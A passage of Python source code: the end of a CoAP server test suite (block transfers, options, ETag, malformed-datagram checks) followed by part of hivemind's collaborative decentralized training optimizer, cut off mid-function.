        req.payload = "rerit ex, quis aliquet ante. Vivamus ultrices dolor at elit tincidunt, eget fringilla " \
                      "ligula vestibulum. In molestie sagittis nibh, ut efficitur tellus faucibus non. Maecenas " \
                      "posuere elementum faucibus. Morbi nisi diam, molestie non feugiat et, elementum eget magna." \
                      " Donec vel sem facilisis quam viverra ultrices nec eu lacus. Sed molestie nisi id ultrices " \
                      "interdum. Curabitur pharetra sed tellus in dignissim. Duis placerat aliquam metus, volutpat " \
                      "elementum augue aliquam a. Nunc sed dolor at orci maximus portt"
        req.block1 = (5, 1, 512)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CONTINUE.number
        expected.token = None
        expected.payload = None
        expected.block1 = (5, 1, 512)

        exchange6 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "itor ac sit amet eros. Mauris et nisi in tortor pharetra rhoncus sit amet hendrerit metus. " \
                      "Integer laoreet placerat cursus. Nam a nulla ex. Donec laoreet sagittis libero quis " \
                      "imperdiet. Vivamus facilisis turpis nec rhoncus venenatis. Duis pulvinar tellus vel quam " \
                      "maximus imperdiet. Mauris eget nibh orci. Duis ut cursus nibh. Nulla sed commodo elit. " \
                      "Suspendisse ac eros lacinia, mattis turpis at, porttitor justo. Vivamus molestie " \
                      "tincidunt libero. Etiam porttitor lacus odio, at lobortis tortor scelerisque nec. " \
                      "Nullam non ante vel nisi ultrices consectetur. Maecenas massa felis, tempor eget " \
                      "malesuada eget, pretium eu sapien. Vivamus dapibus ante erat, non faucibus orci sodales " \
                      "sit amet. Cras magna felis, sodales eget magna sed, eleifend rutrum ligula. Vivamus interdum " \
                      "enim enim, eu facilisis tortor dignissim quis. Ut metus nulla, mattis non lorem et, " \
                      "elementum ultrices orci. Quisque eleifend, arcu vitae ullamcorper pulvinar, ipsum ex " \
                      "sodales arcu, eget consectetur mauris metus ac tortor. Donec id sem felis. Maur"
        req.block1 = (6, 0, 1024)

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = None
        expected.code = defines.Codes.CHANGED.number
        expected.token = None
        expected.payload = None

        exchange7 = (req, expected)
        self.current_mid += 1

        self._test_plugtest([exchange1, exchange2, exchange3, exchange4, exchange5, exchange6, exchange7])

    def test_options(self):
        print("TEST_OPTIONS")
        path = "/Server1/storage/new_res"

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        option = Option()
        option.number = defines.OptionRegistry.ETAG.number
        option.value = "test"
        req.add_option(option)
        req.del_option(option)
        req.payload = "test"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CREATED.number
        expected.token = None
        expected.payload = None
        expected.location_path = "Server1/storage/new_res"

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        option = Option()
        option.number = defines.OptionRegistry.ETAG.number
        option.value = "test"
        req.add_option(option)
        req.del_option_by_name("ETag")
        req.payload = "test"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CREATED.number
        expected.token = None
        expected.payload = None
        expected.location_path = "Server1/storage/new_res"

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        option = Option()
        option.number = defines.OptionRegistry.ETAG.number
        option.value = "test"
        req.add_option(option)
        del req.etag
        req.payload = "test"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CREATED.number
        expected.token = None
        expected.payload = None
        expected.location_path = "Server1/storage/new_res"

        exchange3 = (req, expected)
        self.current_mid += 1

        self._test_with_client([exchange1, exchange2, exchange3])

    def test_content_type(self):
        print("TEST_CONTENT_TYPE")
        path = "/Server1/storage/new_res"

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "<value>test</value>"
        req.content_type = defines.Content_types["application/xml"]

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CREATED.number
        expected.token = None
        expected.payload = None
        expected.location_path = "Server1/storage/new_res"

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = "Basic Resource"

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.PUT.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "test"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CHANGED.number
        expected.token = None
        expected.payload = None

        exchange3 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = "test"

        exchange4 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.accept = defines.Content_types["application/xml"]

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = "<value>test</value>"

        exchange5 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.accept = defines.Content_types["application/json"]

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.NOT_ACCEPTABLE.number
        expected.token = None
        expected.payload = None
        # expected.content_type = defines.Content_types["application/json"]

        exchange6 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = "/Server1/xml"
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = "<value>0</value>"
        expected.content_type = defines.Content_types["application/xml"]

        exchange7 = (req, expected)
        self.current_mid += 1

        self._test_with_client([exchange1, exchange2, exchange3, exchange4, exchange5, exchange6, exchange7])

    def test_ETAG(self):
        print("TEST_ETAG")
        path = "/Server1/etag"

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CONTENT.number
        expected.token = None
        expected.payload = "ETag resource"
        expected.etag = "0"

        exchange1 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.payload = "test"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.CHANGED.number
        expected.token = None
        expected.payload = None
        expected.etag = "1"

        exchange2 = (req, expected)
        self.current_mid += 1

        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        req.etag = "1"

        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.VALID.number
        expected.token = None
expected.payload = None expected.etag = "1" exchange3 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3]) def test_child(self): print("TEST_CHILD") path = "/Server1/child" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "test" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/child" exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "test" exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "testPUT" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CHANGED.number expected.token = None expected.payload = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.DELETE.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.DELETED.number expected.token = None expected.payload = None exchange4 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4]) def test_not_found(self): print("TEST_not_found") path = "/Server1/not_found" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.token = 100 expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.NOT_FOUND.number expected.token = 100 expected.payload = None exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "testPOST" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.METHOD_NOT_ALLOWED.number expected.token = None exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "testPUT" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.NOT_FOUND.number expected.token = None expected.payload = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.DELETE.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = 
defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.NOT_FOUND.number expected.token = None expected.payload = None exchange4 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4]) def test_invalid(self): print("TEST_INVALID") # version req = (b'\x00\x01\x8c\xda', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange1 = (req, expected) # version req = (b'\x40', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange2 = (req, expected) # code req = (b'\x40\x05\x8c\xda', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange3 = (req, expected) # get/option req = (b'\x40\x01\x8c\xda\x94', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange4 = (req, expected) # post/payload marker req = (b'\x40\x02\x8c\xda\x75\x62\x61\x73\x69\x63\xff', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange5 = (req, expected) self._test_datagram([exchange1, exchange2, exchange3, exchange4, exchange5]) def test_post_block_big_client(self): print("TEST_POST_BLOCK_BIG_CLIENT") path = "/Server1/big" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin fermentum ornare. " \ "Cras accumsan tellus quis dui lacinia eleifend. Proin ultrices rutrum orci vitae luctus. " \ "Nullam malesuada pretium elit, at aliquam odio vehicula in. Etiam nec maximus elit. " \ "Etiam at erat ac ex ornare feugiat. Curabitur sed malesuada orci, id aliquet nunc. Phasellus " \ "nec leo luctus, blandit lorem sit amet, interdum metus. Duis efficitur volutpat magna, ac " \ "ultricies nibh aliquet sit amet. Etiam tempor egestas augue in hendrerit. Nunc eget augue " \ "ultricies, dignissim lacus et, vulputate dolor. Nulla eros odio, fringilla vel massa ut, " \ "facilisis cursus quam. Fusce faucibus lobortis congue. Fusce consectetur porta neque, id " \ "sollicitudin velit maximus eu. Sed pharetra leo quam, vel finibus turpis cursus ac. " \ "Aenean ac nisi massa. Cras commodo arcu nec ante tristique ullamcorper. Quisque eu hendrerit" \ " urna. Cras fringilla eros ut nunc maximus, non porta nisl mollis. Aliquam in rutrum massa." \ " Praesent tristique turpis dui, at ultricies lorem fermentum at. Vivamus sit amet ornare neque, " \ "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \ "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \ "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \ "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum." \ "Vivamus ut odio ac odio malesuada accumsan. Aenean vehicula diam at tempus ornare. Phasellus " \ "dictum mauris a mi consequat, vitae mattis nulla fringilla. Ut laoreet tellus in nisl efficitur," \ " a luctus justo tempus. 
Fusce finibus libero eget velit finibus iaculis. Morbi rhoncus purus " \ "vel vestibulum ullamcorper. Sed ac metus in urna fermentum feugiat. Nulla nunc diam, sodales " \ "aliquam mi id, varius porta nisl. Praesent vel nibh ac turpis rutrum laoreet at non odio. " \ "Phasellus ut posuere mi. Suspendisse malesuada velit nec mauris convallis porta. Vivamus " \ "sed ultrices sapien, at cras amet." expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CHANGED.number expected.token = None expected.payload = None exchange1 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1]) def test_observe_client(self): print("TEST_OBSERVE_CLIENT") path = "/Server1/basic" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.observe = 0 expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None exchange1 = (req, expected) self._test_with_client_observe([exchange1]) def test_duplicate(self): print("TEST_DUPLICATE") path = "/Server1/basic" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None self.current_mid += 1 self._test_plugtest([(req, expected), (req, expected)]) def test_duplicate_not_completed(self): print("TEST_DUPLICATE_NOT_COMPLETED") path = "/Server1/long" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = None expected.token = None expected2 = Response() expected2.type = defines.Types["CON"] expected2._mid = None expected2.code = defines.Codes.CONTENT.number expected2.token = None self.current_mid += 1 self._test_plugtest([(req, None), (req, expected), (None, expected2)]) if __name__ == '__main__': unittest.main()
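# --- Illustration (not part of the test suite; runs only on import) -----------
# The (num, m, size) tuples assigned to req.block1/req.block2 above follow the
# RFC 7959 Block option layout. A minimal sketch of that packing, with
# hypothetical helper names (CoAPthon performs this encoding internally):

def pack_block(num, m, size):
    szx = size.bit_length() - 5            # 16 -> 0, 32 -> 1, ..., 1024 -> 6
    assert size == 1 << (szx + 4), "block size must be a power of two in 16..1024"
    return (num << 4) | (m << 3) | szx     # NUM | M | SZX bit fields

def unpack_block(value):
    return (value >> 4, (value >> 3) & 1, 1 << ((value & 0x7) + 4))

# The tuples used in the tests map directly onto this encoding:
assert unpack_block(pack_block(6, 0, 1024)) == (6, 0, 1024)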
collaborative.py
from __future__ import annotations import logging from dataclasses import dataclass from threading import Thread, Lock, Event from typing import Dict, Optional, Iterator import numpy as np import torch from pydantic import BaseModel, StrictBool, StrictFloat, confloat, conint from hivemind.client.averaging.training import TrainingAverager from hivemind.dht import DHT from hivemind.dht.crypto import RSASignatureValidator from hivemind.dht.schema import BytesWithPublicKey, SchemaValidator from hivemind.optim.base import DecentralizedOptimizerBase from hivemind.optim.performance_ema import PerformanceEMA from hivemind.utils import Endpoint, ValueWithExpiration, get_dht_time, get_logger logger = get_logger(__name__) LRSchedulerBase = getattr(torch.optim.lr_scheduler, '_LRScheduler', None) @dataclass(frozen=False) class CollaborationState: optimizer_step: int samples_accumulated: int target_batch_size: int num_peers: int num_clients: int eta_next_step: float next_fetch_time: float @property def ready_for_step(self): return self.samples_accumulated >= self.target_batch_size or get_dht_time() >= self.eta_next_step def register_step(self, local_step: int): self.optimizer_step = max(local_step, self.optimizer_step) self.samples_accumulated = 0 self.eta_next_step = float('inf') class TrainingState(BaseModel): endpoint: Endpoint step: conint(ge=0, strict=True) samples_accumulated: conint(ge=0, strict=True) samples_per_second: confloat(ge=0.0, strict=True) time: StrictFloat client_mode: StrictBool class TrainingProgressSchema(BaseModel): progress: Dict[BytesWithPublicKey, Optional[TrainingState]] class CollaborativeOptimizer(DecentralizedOptimizerBase): """ An optimizer that performs model updates after collaboratively accumulating a target (large) batch size across peers These optimizers use DHT to track how much progress did the collaboration make towards target batch size. Once enough samples were accumulated, optimizers will compute a weighted average of their statistics. :note: This optimizer behaves unlike regular pytorch optimizers in two ways: - calling .step will periodically zero-out gradients w.r.t. model parameters after each step - it may take multiple .step calls without updating model parameters, waiting for peers to accumulate enough samples :param opt: a standard pytorch optimizer, preferably a large-batch one such as LAMB, LARS, etc. 
:param dht: a running hivemind.DHT daemon connected to other peers :param prefix: a common prefix for all metadata stored by CollaborativeOptimizer in the DHT :param target_batch_size: perform optimizer step after all peers collectively accumulate this many samples :param batch_size_per_step: before each call to .step, user should accumulate gradients over this many samples :param min_refresh_period: wait for at least this many seconds before fetching new collaboration state :param max_refresh_period: wait for at most this many seconds before fetching new collaboration state :param default_refresh_period: if no peers are detected, attempt to fetch collaboration state this often (seconds) :param expected_drift_peers: assume that this many new peers can join between steps :param expected_drift_rate: assumes that this fraction of current collaboration can join/leave between steps :note: the expected collaboration drift parameters are used to adjust the frequency with which this optimizer will refresh the collaboration-wide statistics (to avoid missing the moment when to run the next step) :param bandwidth: peer's network bandwidth for the purpose of load balancing (recommended: internet speed in mbps) :param step_tolerance: a peer can temporarily be delayed by this many steps without being deemed out of sync :param performance_ema_alpha: smoothing value used to estimate this peer's performance (training samples per second) :param averaging_expiration: peer's requests for averaging will be valid for this many seconds :param metadata_expiration: peer's metadata (e.g. samples processed) is stored onto DHT for this many seconds :param averaging_timeout: if an averaging step hangs for this long, it will be cancelled. :param scheduler: if specified, use this scheduler to update optimizer learning rate :param reuse_grad_buffers: if True, use model's .grad buffers for gradient accumulation. This is more memory efficient, but it requires that the user does *NOT* call model/opt zero_grad at all :param accumulate_grads_on: if specified, accumulate gradients on this device. By default, this will use the same device as model parameters. One can specify a different device (e.g. 'cpu' vs 'cuda') to save device memory at the cost of extra time per step. If reuse_gradient_accumulators is True, this parameter has no effect. :param client_mode: if True, runs training without incoming connections, in a firewall-compatible mode :param kwargs: additional parameters forwarded to DecentralizedAverager :note: if you are using CollaborativeOptimizer with a lr_scheduler, it is recommended to pass this scheduler explicitly into this class. Otherwise, scheduler may not be synchronized between peers. 
""" def __init__(self, opt: torch.optim.Optimizer, *, dht: DHT, prefix: str, target_batch_size: int, batch_size_per_step: Optional[int] = None, scheduler: Optional[LRSchedulerBase] = None, min_refresh_period: float = 0.5, max_refresh_period: float = 30, default_refresh_period: float = 3, expected_drift_peers: float = 3, expected_drift_rate: float = 0.2, performance_ema_alpha: float = 0.1, metadata_expiration: float = 60.0, averaging_timeout: Optional[float] = None, step_tolerance: int = 1, reuse_grad_buffers: bool = False, accumulate_grads_on: Optional[torch.device] = None, client_mode: bool = False, verbose: bool = False, **kwargs): super().__init__(opt, dht) signature_validator = RSASignatureValidator() self._local_public_key = signature_validator.local_public_key dht.add_validators([SchemaValidator(TrainingProgressSchema, prefix=prefix), signature_validator]) if reuse_grad_buffers and accumulate_grads_on is not None: logger.warning("Setting 'accumulate_grads_on' has no effect if reuse_grad_buffers=True") self.prefix, self.scheduler = prefix, scheduler self.target_batch_size, self.batch_size_per_step = target_batch_size, batch_size_per_step self.min_refresh_period, self.max_refresh_period, self.default_refresh_period =\ min_refresh_period, max_refresh_period, default_refresh_period self.expected_drift_peers, self.expected_drift_rate = expected_drift_peers, expected_drift_rate self.averaging_timeout, self.metadata_expiration = averaging_timeout, metadata_expiration self._grads, self.reuse_grad_buffers, self.accumulate_grads_on = None, reuse_grad_buffers, accumulate_grads_on self.client_mode, self.step_tolerance = client_mode, step_tolerance self.status_loglevel = logging.INFO if verbose else logging.DEBUG self.averager = self._make_averager(**kwargs) self.training_progress_key = f"{self.prefix}_progress" self.local_samples_accumulated = 0 # a number of local samples accumulated since last optimizer update self.local_steps_accumulated = 0 # a number of calls to step() since last optimizer update self.performance_ema = PerformanceEMA(alpha=performance_ema_alpha) self.last_step_time = None self.collaboration_state = self.fetch_collaboration_state() self.lock_collaboration_state, self.collaboration_state_updated = Lock(), Event() self.lock_local_progress, self.should_report_progress = Lock(), Event() self.progress_reporter = Thread(target=self.report_training_progress, daemon=True, name=f"{self}.reporter") self.progress_reporter.start() self.collaboration_state_updater = Thread(target=self.check_collaboration_state_periodically, daemon=True, name=f"{self}.collaboration_state_updater") self.collaboration_state_updater.start() def _make_averager(self, **kwargs): return TrainingAverager(self.opt, dht=self.dht, average_parameters=True, average_gradients=True, prefix=f"{self.prefix}_averaging", allreduce_timeout=self.averaging_timeout, listen=not self.client_mode, **kwargs) @property def local_step(self) -> int: return self.averager.local_step @property def is_synchronized(self) -> bool: return self.local_step >= self.collaboration_state.optimizer_step - self.step_tolerance def is_alive(self) -> bool: return self.averager.is_alive() def load_state_from_peers(self, **kwargs): """ Attempt to fetch the newest collaboration state from other peers """ with self.lock_collaboration_state: self.averager.load_state_from_peers(**kwargs) self.local_samples_accumulated = self.local_steps_accumulated = 0 self.reset_accumulated_grads_() self.update_scheduler() def step(self, batch_size: Optional[int] = None, 
**kwargs): """ Report accumulating gradients w.r.t. batch_size additional samples, optionally update model parameters :param batch_size: optional override for batch_size_per_step from init :note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details. """ if self.batch_size_per_step is None: if batch_size is None: raise ValueError("Please either set batch_size_per_step parameter at init or when calling .step") logger.log(self.status_loglevel, f"Setting default batch_size_per_step to {batch_size}") self.batch_size_per_step = batch_size batch_size = batch_size if batch_size is not None else self.batch_size_per_step if not self.is_synchronized: logger.log(self.status_loglevel, "Peer is out of sync.") self.load_state_from_peers() return if self.last_step_time is not None and get_dht_time() - self.last_step_time > self.metadata_expiration: logger.warning(f"Training step took {get_dht_time() - self.last_step_time}, " f"but metadata expired in {self.metadata_expiration} s.") self.accumulate_grads_(batch_size) with self.lock_local_progress: self.local_samples_accumulated += batch_size self.local_steps_accumulated += 1 self.performance_ema.update(num_processed=batch_size) self.should_report_progress.set() if not self.collaboration_state.ready_for_step: return logger.log(self.status_loglevel, f"Beginning global optimizer step {self.collaboration_state.optimizer_step}") self.collaboration_state = self.fetch_collaboration_state() self.collaboration_state_updated.set() if not self.is_synchronized: self.load_state_from_peers() return with self.performance_ema.pause(), self.lock_collaboration_state: # divide accumulators by local steps to recover the true average grad w.r.t. local_samples_accumulated self.apply_accumulated_grads_(scale_by=1. / self.local_steps_accumulated) current_step, group_info = self.averager.local_step, None if self.collaboration_state.num_peers > 1: mean_samples_per_worker = self.target_batch_size / self.collaboration_state.num_peers weight = self.local_samples_accumulated / mean_samples_per_worker try: group_info = self.averager.step(weight=weight, timeout=self.averaging_timeout, **kwargs) if group_info: logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers") except BaseException as e: logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}.") else: logger.log(self.status_loglevel, f"Skipped averaging: collaboration consists of " f"{self.collaboration_state.num_peers} peer(s).") self.opt.step() self.reset_accumulated_grads_() self.local_samples_accumulated = self.local_steps_accumulated = 0 self.collaboration_state.register_step(current_step + 1) self.averager.local_step = current_step + 1 self.collaboration_state_updated.set() self.update_scheduler() logger.log(self.status_loglevel, f"Optimizer step: done!") return group_info def step_aux(self, **kwargs): """ Find and assist other peers in averaging without sending local gradients. :note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details. """ if not self.collaboration_state.ready_for_step: return logger.log(self.status_loglevel, f"Beginning global optimizer step {self.collaboration_state.optimizer_step}") self.collaboration_state = self.fetch_collaboration_state() self.collaboration_state_updated.set() with self.lock_collaboration_state: # divide accumulators by local steps to recover the true average grad w.r.t. 
local_samples_accumulated current_step, group_info = self.averager.local_step, None try: group_info = self.averager.step(timeout=self.averaging_timeout, **kwargs) if group_info: logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers") except BaseException as e: logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}.") self.collaboration_state.register_step(current_step + 1) self.averager.local_step = current_step + 1 self.collaboration_state_updated.set() logger.log(self.status_loglevel, f"Optimizer step: done!") return group_info def _grad_buffers(self) -> Iterator[torch.Tensor]: """ pytorch-internal gradient buffers """ for param_group in self.opt.param_groups: for param in param_group['params']: if param.grad is None: yield torch.zeros_like(param) else: yield param.grad @torch.no_grad() def accumulated_grads(self) -> Iterator[torch.Tensor]: """ local gradient accumulators """ if self.reuse_grad_buffers: yield from self._grad_buffers() elif self._grads is None: with torch.no_grad(): self._grads = [torch.zeros_like(grad, device=self.accumulate_grads_on) for grad in self._grad_buffers()] yield from self._grads @torch.no_grad() def accumulate_grads_(self, batch_size: int): """ add current gradients to grad accumulators (if any) """ if self.reuse_grad_buffers: return # user is responsible for accumulating gradients in .grad buffers alpha = float(batch_size) / self.batch_size_per_step for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()): grad_acc.add_(grad_buf.to(grad_acc.device), alpha=alpha) @torch.no_grad() def apply_accumulated_grads_(self, scale_by: Optional[float] = None): if self.reuse_grad_buffers: return for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()): grad_buf[...] = grad_acc.to(grad_buf.device) if scale_by is not None: grad_buf.mul_(scale_by) @torch.no_grad() def reset_accumulated_grads_(self): if self.reuse_grad_buffers: self.opt.zero_grad() else: for grad_buf in self.accumulated_grads(): grad_buf.zero_() def report_training_progress(self): """ Periodically publish metadata and the current number of samples accumulated towards the next step """ while self.is_alive(): self.should_report_progress.wait() self.should_report_progress.clear() with self.lock_local_progress: current_time = get_dht_time() local_state_info = TrainingState( endpoint=self.averager.endpoint, step=self.local_step, samples_accumulated=self.local_samples_accumulated, samples_per_second=self.performance_ema.samples_per_second, time=current_time, client_mode=not self.averager.listen) self.dht.store(key=self.training_progress_key, subkey=self._local_public_key, value=local_state_info.dict(), expiration_time=current_time + self.metadata_expiration, return_future=True) def check_collaboration_state_periodically(self): """ Periodically check the training progress from all peers. 
Trigger update after target_batch_size total samples """ while self.is_alive(): time_to_next_update = max(0.0, self.collaboration_state.next_fetch_time - get_dht_time()) if self.collaboration_state_updated.wait(time_to_next_update): self.collaboration_state_updated.clear() continue # if state was updated externally, reset timer with self.lock_collaboration_state: self.collaboration_state = self.fetch_collaboration_state() def fetch_collaboration_state(self) -> CollaborationState: """ Read performance statistics reported by peers, estimate progress towards next batch """ response, _expiration = self.dht.get(self.training_progress_key, latest=True) or (None, -float('inf')) current_time = get_dht_time() if not isinstance(response, dict) or len(response) == 0: logger.log(self.status_loglevel, f"Found no active peers: {response}") local_eta_next_step = max(0, self.target_batch_size - self.local_steps_accumulated ) / self.performance_ema.samples_per_second return CollaborationState(self.local_step, self.local_samples_accumulated, self.target_batch_size, num_peers=0, num_clients=0, eta_next_step=current_time + local_eta_next_step, next_fetch_time=current_time + self.default_refresh_period) valid_peer_states = [TrainingState.parse_obj(peer_state.value) for peer_state in response.values() if peer_state.value is not None] num_peers = len(valid_peer_states) num_clients = sum(state.client_mode for state in valid_peer_states) global_optimizer_step = self.local_step for state in valid_peer_states: if not state.client_mode: global_optimizer_step = max(global_optimizer_step, state.step) total_samples_accumulated = estimated_current_samples = total_samples_per_second = 0 for state in valid_peer_states: total_samples_per_second += state.samples_per_second if state.step == global_optimizer_step: total_samples_accumulated += state.samples_accumulated estimated_current_samples += (state.samples_accumulated + max(0, current_time - state.time) * state.samples_per_second) # note: we deliberately count only valid peers for samples_accumulated, but all peers for performance; # the rationale behind this is that outdated peers will synchronize and begin contributing shortly. estimated_samples_remaining = self.target_batch_size - estimated_current_samples estimated_time_to_next_step = max(0, estimated_samples_remaining) / total_samples_per_second expected_max_peers = max(num_peers + 